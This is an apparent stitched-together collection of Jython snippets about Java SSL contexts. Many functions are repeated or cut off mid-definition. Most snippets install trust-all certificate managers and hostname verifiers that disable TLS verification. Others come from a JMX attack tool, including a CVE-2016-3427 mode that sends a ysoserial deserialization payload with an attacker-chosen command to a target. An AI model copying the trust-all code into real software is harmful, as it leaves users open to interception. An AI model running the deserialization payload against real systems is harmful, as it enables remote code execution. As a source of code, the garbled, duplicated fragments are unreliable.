def initSSL(cls):
import sys
if not 'java' in sys.platform or cls.SSL_INITED:
return
logger.info('=============Init Trust All Cert==================')
from javax.net.ssl import X509TrustManager
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
'''Define a custom TrustManager which will blindly accept all certificates'''
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = [TrustAllX509TrustManager()]
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
# Keep a static reference to the JVM's default SSLContext for restoring at a later time
cls.DEFAULT_CONTEXT = SSLContext.getDefault()
cls.TRUST_ALL_CONTEXT = TRUST_ALL_CONTEXT
cls.SSL_INITED = True
def disable_all_ssl_cert_checks(self):
from javax.net.ssl import TrustManager, X509TrustManager
from jarray import array
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
"""
Define a custom TrustManager which will blindly accept all certificates
"""
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
self.log.info("Disabling cert check ##############")
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
# Keep a static reference to the JVM's default SSLContext for restoring
# at a later time
DEFAULT_CONTEXT = SSLContext.getDefault()
def connectToJMX(args):
# Basic JMX connection, always required
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" +
args.targetHost + ":" + args.targetPort +
"/jmxrmi")
print "[+] Connecting to: " + str(jmx_url)
try:
# for passing credentials for password
if args.jmxpassword and args.jmxrole:
print("[+] Using credentials: " + str(args.jmxrole) + " / " +
str(args.jmxpassword))
credentials = array([args.jmxrole, args.jmxpassword], String)
environment = {JMXConnector.CREDENTIALS: credentials}
jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
else:
jmx_connector = JMXConnectorFactory.connect(jmx_url)
print "[+] Connected: " + str(jmx_connector.getConnectionId())
bean_server = jmx_connector.getMBeanServerConnection()
return bean_server
except:
print "[-] Error: Can't connect to remote service"
if "Authentication failed! Invalid username or password" in str(
sys.exc_info()[1]):
print "[-] Authentication failed! Invalid username or password"
sys.exit(-1)
def initSSL(cls):
if not 'java' in sys.platform or cls.SSL_INITED:
return
logger.info('=============Init Trust All Cert==================')
from javax.net.ssl import X509TrustManager
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
'''Define a custom TrustManager which will blindly accept all certificates'''
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
trust_managers = [TrustAllX509TrustManager()]
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
# Keep a static reference to the JVM's default SSLContext for restoring at a later time
cls.DEFAULT_CONTEXT = SSLContext.getDefault()
cls.TRUST_ALL_CONTEXT = TRUST_ALL_CONTEXT
cls.SSL_INITED = True
def trust_all_certs():
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def _get_ssl_context(keyfile, certfile, ca_certs):
if certfile is None and ca_certs is None:
log.debug("Using default SSL context", extra={"sock": "*"})
return SSLContext.getDefault()
else:
log.debug(
"Setting up a specific SSL context for keyfile=%s, certfile=%s, ca_certs=%s",
keyfile,
certfile,
ca_certs,
extra={"sock": "*"})
if ca_certs:
# should support composite usage below
trust_managers = _get_ca_certs_trust_manager(
ca_certs).getTrustManagers()
else:
trust_managers = None
if certfile:
key_managers = _get_openssl_key_manager(certfile,
keyfile).getKeyManagers()
else:
key_managers = None
# FIXME FIXME for performance, cache this lookup in the future
# to avoid re-reading files on every lookup
context = SSLContext.getInstance("SSL")
context.init(key_managers, trust_managers, None)
return context
def _enableTrustAllCertificates(cls, enable=True):
logger.info('Enable trust all certs')
cls.initSSL()
from javax.net.ssl import SSLContext
if enable and TrustAllCert.TRUST_ALL_CONTEXT:
SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
elif TrustAllCert.DEFAULT_CONTEXT:
SSLContext.setDefault(TrustAllCert.DEFAULT_CONTEXT)
def _enableTrustAllCertificates(cls, enable=True):
logger.info('Enable trust all certs')
cls.initSSL()
from javax.net.ssl import SSLContext
if enable and TrustAllCert.TRUST_ALL_CONTEXT:
SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
elif TrustAllCert.DEFAULT_CONTEXT:
SSLContext.setDefault(TrustAllCert.DEFAULT_CONTEXT)
def trust_all_certificates():
"""Blindly trusts all certificates; note this is a per-JVM process setting."""
if not TrustAllCertificates._blind_trust:
print >> sys.stderr, "Trusting all certificates without verifying them for this process."
print >> sys.stderr, "It would be best to install certificates in the JVM's trust store."
print >> sys.stderr, "Currently there is no way to turn this off."
trust_managers = array(TrustManager, [TrustAllX509TrustManager()])
trust_all_context = SSLContext.getInstance("SSL")
trust_all_context.init(None, trust_managers, None)
SSLContext.setDefault(trust_all_context)
TrustAllCertificates._blind_trust = True
def wrapped(*args, **kwargs):
# Only do this if running under Jython
if 'java' in sys.platform:
from javax.net.ssl import SSLContext
SSLContext.setDefault(TRUST_ALL_CONTEXT)
try:
res = f(*args, **kwargs)
return res
finally:
SSLContext.setDefault(DEFAULT_CONTEXT)
else:
return f(*args, **kwargs)
def wrapped(*args, **kwargs):
# Only do this if running under Jython
if 'java' in sys.platform:
from javax.net.ssl import SSLContext
SSLContext.setDefault(TRUST_ALL_CONTEXT)
try:
res = f(*args, **kwargs)
return res
finally:
SSLContext.setDefault(DEFAULT_CONTEXT)
else:
return f(*args, **kwargs)
def trust_all_certificates():
"""Blindly trusts all certificates; note this is a per-JVM process setting."""
global _blind_trust
if not _blind_trust:
print >> sys.stderr, "Trusting all certificates without verifying them for this process."
print >> sys.stderr, "It would be best to install certificates in the JVM's trust store."
print >> sys.stderr, "Currently there is no way to turn this off."
trust_managers = array(TrustManager, [TrustAllX509TrustManager()])
trust_all_context = SSLContext.getInstance("SSL")
trust_all_context.init(None, trust_managers, None)
SSLContext.setDefault(trust_all_context)
_blind_trust = True
def trust_all_certificates(request):
'''Decorator function that will make it so the context of the decorated
method will run with our TrustManager that accepts all certificates'''
# Only do this if running under Jython
is_java = 'java' in sys.platform
if is_java:
from javax.net.ssl import SSLContext
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def fin():
if is_java:
SSLContext.setDefault(DEFAULT_CONTEXT)
request.addfinalizer(fin)
def trust_all_certificates(request):
'''Decorator function that will make it so the context of the decorated
method will run with our TrustManager that accepts all certificates'''
# Only do this if running under Jython
is_java = 'java' in sys.platform
if is_java:
from javax.net.ssl import SSLContext
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def fin():
if is_java:
SSLContext.setDefault(DEFAULT_CONTEXT)
request.addfinalizer(fin)
def ignoreJavaSSL():
"""
Creates a dummy socket factory that doesn't verify connections.
HttpsURLConnection.setDefaultSSLSocketFactory(...)
This code was taken from multiple sources.
Only makes since in jython (java). otherwise, just use verify=False!
"""
import sys
if not 'java' in sys.platform:
raise RuntimeError('only use if platform (sys.platform) is java!')
else:
#===================================================================
# set default SSL socket to ignore verification
#===================================================================
import javax.net.ssl.X509TrustManager as X509TrustManager # @UnresolvedImport
class MyTrustManager(X509TrustManager):
def getAcceptedIssuers(self,*args,**keys):
return None
def checkServerTrusted(self,*args,**keys):
pass
def checkClientTrusted(self,*args,**keys):
pass
import com.sun.net.ssl.internal.ssl.Provider # @UnresolvedImport
from java.security import Security # @UnresolvedImport
Security.addProvider(com.sun.net.ssl.internal.ssl.Provider())
trustAllCerts = [MyTrustManager()]
import javax.net.ssl.SSLContext as SSLContext # @UnresolvedImport
sc = SSLContext.getInstance("SSL");
import java.security.SecureRandom as SecureRandom # @UnresolvedImport
sc.init(None, trustAllCerts,SecureRandom())
import javax.net.ssl.HttpsURLConnection as HttpsURLConnection # @UnresolvedImport
HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory())
#===================================================================
# Do a test!
#===================================================================
'''
# setup proxy
import java.net.Proxy as Proxy
import java.net.InetSocketAddress as InetSocketAddress
p = Proxy(Proxy.Type.HTTP,InetSocketAddress("host",port))
import java.net.URL as URL
u = URL("https://www.google.com/")
conn = u.openConnection(p)
print 'server response: %r',conn.getResponseCode()
'''
#===================================================================
# ignore requests's error logging - this is for dev
#===================================================================
try:
import requests.packages.urllib3 as urllib3
urllib3.disable_warnings()
except: pass
return 'SSL verification in Java is disabled!'
def trustSpecificCertificate(self, pemCertificateFile, pemCertificateAlias):
from java.io import BufferedInputStream, FileInputStream
from java.security import KeyStore
from java.security.cert import CertificateFactory, X509Certificate
from javax.net.ssl import SSLContext, TrustManagerFactory
fis = FileInputStream(pemCertificateFile)
bis = BufferedInputStream(fis)
ca = CertificateFactory.getInstance("X.509").generateCertificate(bis)
ks = KeyStore.getInstance(KeyStore.getDefaultType())
ks.load(None, None)
ks.setCertificateEntry(pemCertificateAlias, ca)
tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm())
tmf.init(ks)
context = SSLContext.getInstance("SSL")
context.init(None, tmf.getTrustManagers(), None)
SSLContext.setDefault(context)
def trustAllCertificate(self):
from javax.net.ssl import TrustManager, X509TrustManager
from jarray import array
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def use_secure_ssl(client, protocols):
context = SSLContext.getInstance('SSL')
context.init(None, [DefaultTrustManager], SecureRandom())
factory = SSLSocketFactory(protocols)(context)
https = Scheme('https', factory, 443)
schemeRegistry = client.getWebConnection().getHttpClient(
).getConnectionManager().getSchemeRegistry()
schemeRegistry.register(https)
def _get_ssl_context(keyfile, certfile, ca_certs):
if certfile is None and ca_certs is None:
return SSLContext.getDefault()
else:
if ca_certs:
# should support composite usage below
trust_managers = _get_ca_certs_trust_manager(ca_certs).getTrustManagers()
else:
trust_managers = None
if certfile:
key_managers = _get_openssl_key_manager(certfile, keyfile).getKeyManagers()
else:
key_managers = None
# cache this lookup in the future to avoid re-reading files on every
# lookup
context = SSLContext.getInstance("SSL")
context.init(key_managers, trust_managers, None)
return context
def connectToJMX(args):
# Basic JMX connection, always required
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" +
args.targetHost + ":" + args.targetPort +
"/jmxrmi")
print "[+] Connecting to: " + str(jmx_url)
try:
jmx_connector = JMXConnectorFactory.connect(jmx_url)
print "[+] Connected: " + str(jmx_connector.getConnectionId())
bean_server = jmx_connector.getMBeanServerConnection()
return bean_server
except IOException:
print "[-] Error: Can't connect to remote service"
sys.exit(-1)
def trustSpecificCertificate(self, pemCertificateFile,
pemCertificateAlias):
from java.io import BufferedInputStream, FileInputStream
from java.security import KeyStore
from java.security.cert import CertificateFactory, X509Certificate
from javax.net.ssl import SSLContext, TrustManagerFactory
fis = FileInputStream(pemCertificateFile)
bis = BufferedInputStream(fis)
ca = CertificateFactory.getInstance("X.509").generateCertificate(bis)
ks = KeyStore.getInstance(KeyStore.getDefaultType())
ks.load(None, None)
ks.setCertificateEntry(pemCertificateAlias, ca)
tmf = TrustManagerFactory.getInstance(
TrustManagerFactory.getDefaultAlgorithm())
tmf.init(ks)
context = SSLContext.getInstance("SSL")
context.init(None, tmf.getTrustManagers(), None)
SSLContext.setDefault(context)
def connectToJMX(args):
# Basic JMX connection, always required
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
if args.jmxmp:
jmx_url = jmxmp_url(args)
else:
jmx_url = jxmrmi_url(args)
# import after url in order to import the correct protocol implementation
from javax.management.remote import JMXConnector
from javax.management.remote import JMXConnectorFactory
print "[+] Connecting to: " + str(jmx_url)
try:
# for passing credentials for password
if args.jmxpassword and args.jmxrole:
print("[+] Using credentials: " + str(args.jmxrole) + " / " +
str(args.jmxpassword))
credentials = array([args.jmxrole, args.jmxpassword], String)
environment = {JMXConnector.CREDENTIALS: credentials}
jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
else:
jmx_connector = JMXConnectorFactory.connect(jmx_url)
print "[+] Connected: " + str(jmx_connector.getConnectionId())
bean_server = jmx_connector.getMBeanServerConnection()
return bean_server
except:
print "[-] Error: Can't connect to remote service"
if "Authentication failed! Invalid username or password" in str(
sys.exc_info()[1]):
print "[-] Authentication failed! Invalid username or password"
if "Connection refused to host: 127.0.0.1" in str(sys.exc_info()):
print "[-] Connection refused to 127.0.0.1! Try the localhost_bypass"
sys.exit(-1)
def trustAllCertificate(self):
from javax.net.ssl import TrustManager, X509TrustManager
from jarray import array
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def _get_ssl_context(keyfile, certfile, ca_certs):
if certfile is None and ca_certs is None:
log.debug("Using default SSL context", extra={"sock": "*"})
return SSLContext.getDefault()
else:
log.debug("Setting up a specific SSL context for keyfile=%s, certfile=%s, ca_certs=%s",
keyfile, certfile, ca_certs, extra={"sock": "*"})
if ca_certs:
# should support composite usage below
trust_managers = _get_ca_certs_trust_manager(ca_certs).getTrustManagers()
else:
trust_managers = None
if certfile:
key_managers = _get_openssl_key_manager(certfile, keyfile).getKeyManagers()
else:
key_managers = None
# FIXME FIXME for performance, cache this lookup in the future
# to avoid re-reading files on every lookup
context = SSLContext.getInstance("SSL")
context.init(key_managers, trust_managers, None)
return context
def cve_2016_3427Mode(args):
if not os.path.isfile('./jars/ysoserial.jar'):
print "[-] Error: Did not find ysoserial.jar in jars directory. Please download it from https://github.com/frohoff/ysoserial and move it in the jars directory"
sys.exit(1)
sys.path.append("./jars/ysoserial.jar")
print "[+] Added ysoserial API capacities"
from ysoserial.payloads.ObjectPayload import Utils
payload_object = Utils.makePayloadObject(args.gadget, args.cmd)
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
from javax.management.remote import JMXConnector
from javax.management.remote import JMXConnectorFactory
jmx_url = jxmrmi_url(args)
print "[+] Connecting to: " + str(jmx_url)
try:
environment = {JMXConnector.CREDENTIALS: payload_object}
jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
except:
if "java.io.InvalidClassException: filter status: REJECTED" in str(
sys.exc_info()):
print "[-] Not vulnerable"
elif "Credentials should be String[]" in str(sys.exc_info()):
print "[+] Object was deserialized, target could be vulnerable"
print "[?]: Returned error: "
print str(sys.exc_info())
print "[+] Done"
def use_insecure_ssl(client, protocols):
"""Installs a fake trust manager and hostname verifier on an HTMLUnit
WebClient, ensuring that it will never balk at poorly set up SSL
servers.
"""
context = SSLContext.getInstance('SSL')
context.init(None, [FakeX509TrustManager()], SecureRandom())
# Normal factory with SSLv2Hello, SSLv3, TLSv1 enabled
factory = SSLSocketFactory(protocols)(context)
factory.setHostnameVerifier(
org.apache.http.conn.ssl.AllowAllHostnameVerifier())
https = Scheme('https', factory, 443)
schemeRegistry = client.getWebConnection().getHttpClient(
).getConnectionManager().getSchemeRegistry()
schemeRegistry.register(https)
def testPage(self, page):
class MyTrustManager(X509TrustManager):
def getAcceptedIssuers(self):
return None
def checkClientTrusted(self, certs, auth):
pass
def checkServerTrusted(self, certs, auth):
pass
trustAllCerts = [MyTrustManager()]
sc = SSLContext.getInstance("SSL")
sc.init(None, trustAllCerts, SecureRandom())
HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory())
class MyHostnameVerifier(HostnameVerifier):
def verify(self, host, sess):
return True
HttpsURLConnection.setDefaultHostnameVerifier(MyHostnameVerifier())
try:
httpsURL = 'https://%s:%s/%s' % (self._host, self._port, page)
url = URL(httpsURL)
conn = url.openConnection()
conn.setConnectTimeout(5000)
conn.setRequestProperty("Accept-encoding", 'gzip,deflate,compress')
conn.setRequestProperty(
"User-agent",
'https://google.com/' if 'google' not in self._host else
'https://yandex.ru/') # Use foreign referer
#ist = conn.getInputStream()
#isr = InputStreamReader(ist)
#br = BufferedReader(isr)
print("[BREACH] Received response: %d" % conn.getResponseCode())
if conn.getContentEncoding() != None:
print("[BREACH] Received Content-encoding: %s" %
(conn.getContentEncoding()))
return True
except:
print("[BREACH] Socket timeout or an error occurred")
return False
def createSSLSocket(host, port):
'''
Creates SSL Socket
@types: str, int -> javax.net.ssl.SSLSocket
'''
# Create own TrustManager to be able to accept all certificates (even invalid)
# configure the SSLContext with a TrustManager
ctx = SSLContext.getInstance("TLS")
keyManagers = jarray(KeyManager)
trustManagers = jarray(TrustManager)
trustManagers.append(DefaultTrustManager())
ctx.init(keyManagers, trustManagers, SecureRandom())
# Gets the default static SSLSocketFactory that is inherited by new instances of this class.
# The socket factories are used when creating sockets for secure https URL connections.
factory = ctx.getSocketFactory()
# Creates a socket and connects it to the specified remote host at the specified remote
# port. This socket is configured using the socket options established for this
# factory.
return factory.createSocket(host, int(port))
def createSSLSocket(host, port):
'''
Creates SSL Socket
@types: str, int -> javax.net.ssl.SSLSocket
'''
# Create own TrustManager to be able to accept all certificates (even invalid)
# configure the SSLContext with a TrustManager
ctx = SSLContext.getInstance("TLS")
keyManagers = jarray(KeyManager)
trustManagers = jarray(TrustManager)
trustManagers.append(DefaultTrustManager())
ctx.init(keyManagers, trustManagers, SecureRandom())
# Gets the default static SSLSocketFactory that is inherited by new instances of this class.
# The socket factories are used when creating sockets for secure https URL connections.
factory = ctx.getSocketFactory()
# Creates a socket and connects it to the specified remote host at the specified remote
# port. This socket is configured using the socket options established for this
# factory.
return factory.createSocket(host, int(port))
def fin():
if is_java:
SSLContext.setDefault(DEFAULT_CONTEXT)
"""Define a custom TrustManager which will blindly accept all
certificates"""
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
# Keep a static reference to the JVM's default SSLContext for restoring
# at a later time
DEFAULT_CONTEXT = SSLContext.getDefault()
@pytest.fixture
def trust_all_certificates(request):
"""Decorator function that will make it so the context of the decorated
method will run with our TrustManager that accepts all certificates"""
# Only do this if running under Jython
is_java = "java" in sys.platform
if is_java:
from javax.net.ssl import SSLContext
def fin():
if is_java:
SSLContext.setDefault(DEFAULT_CONTEXT)
from jarray import array
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
'''Define a custom TrustManager which will blindly accept all certificates'''
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
class TestClient(threading.Thread):
TOTAL_COUNT = 0
IS_EXIT = False
def __init__(self, host, port=None):
threading.Thread.__init__(self, name=threading.active_count())
self.host = host
self.port = port
self.conn = HTTPSConnection(self.host, self.port,
timeout=ARGS.BATCH_SIZE*ARGS.BATCHES/2)
self.count = 0
#random.shuffle(TestClient.ids)
# Copied from http://tech.pedersen-live.com/2010/10/trusting-all-certificates-in-jython/
import sys
# Check if running in Jython
if 'java' in sys.platform:
from javax.net.ssl import TrustManager, X509TrustManager
from jarray import array
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
"""
Define a custom TrustManager which will blindly accept all certificates
"""
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
# Keep a static reference to the JVM's default SSLContext for restoring
# at a later time
DEFAULT_CONTEXT = SSLContext.getDefault()
def enableTrustAllCertificates(cls):
logger.info('Enable trust all certs')
cls.initSSL()
from javax.net.ssl import SSLContext
SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
def enableTrustAllCertificates(cls):
logger.info('Enable trust all certs')
cls.initSSL()
from javax.net.ssl import SSLContext
SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
def initChannel(self, ch):
pipeline = ch.pipeline()
engine = SSLContext.getDefault().createSSLEngine()
engine.setUseClientMode(True);
pipeline.addLast("ssl", SslHandler(engine))
class TrustAllX509TrustManager(X509TrustManager):
'''Define a custom TrustManager which will blindly accept all certificates'''
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
class TestClient(threading.Thread):
TOTAL_COUNT = 0
IS_EXIT = False
def __init__(self, host, port=None):
threading.Thread.__init__(self, name=threading.active_count())
self.host = host
self.port = port
self.conn = HTTPSConnection(self.host,
self.port,
timeout=ARGS.BATCH_SIZE * ARGS.BATCHES / 2)
